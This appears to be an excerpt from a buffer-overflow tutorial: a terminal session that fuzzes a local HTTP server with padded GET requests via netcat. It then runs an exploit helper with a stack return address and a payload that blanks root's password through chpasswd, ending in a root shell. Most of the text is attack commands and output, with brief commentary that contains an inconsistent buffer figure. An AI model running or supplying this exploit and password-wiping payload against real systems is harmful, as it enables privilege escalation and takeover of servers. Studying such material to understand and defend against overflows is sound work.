WebHosting Paid by #1Payday.Loans
duesentrieb:~$ printf '%-*s\n\n' 1000 'GET / HTTP/1.0' | ./netcat localhost 80 HTTP/1.0 200 Ok ...
duesentrieb:~$ printf '%-*s\n\n' 10000 'GET / HTTP/1.0' | ./netcat localhost 80 HTTP/1.0 200 Ok ...
duesentrieb:~$ printf '%-*s\n\n' 20000 'GET / HTTP/1.0' | ./netcat localhost 80[ ... ]
duesentrieb:~$ printf '%-*s\n\n' 10116 'GET / HTTP/1.0' | ./netcat localhost 80 HTTP/1.0 200 Ok ...
duesentrieb:~$ printf '%-*s\n\n' 10120 'GET / HTTP/1.0' | ./netcat localhost 80
Ok - so let's exploit it:
duesentrieb:~$ ./prog2b 5000 6000 5000 0xbffffabc 8000 \ 'echo root: | /usr/sbin/chpasswd -e' | \ ./netcat localhost 80 duesentrieb:~$ su - Password:Hmm - that didn't work. Probably the 10120 bytes "buffer size" is not the size of the buffer, but the end of the stack instead. So it segfaults before beeing able to return from the function and execute our code. In that case the output would be generated before the function returns and that's why we even see something when we write over the end of our stack frame. That's bad, because now we don't know how big the buffer is. All we know that it is smaler than 1120 bytes. Let's try it with a value suitable for a 10000 bytes big buffer:
duesentrieb:~$ ./prog2b 5000 5000 5000 0xbffffabc 8000 \ 'echo root: | /usr/sbin/chpasswd -e' | \ ./netcat localhost 80 duesentrieb:~$ su - duesentrieb:~#Now we are root ...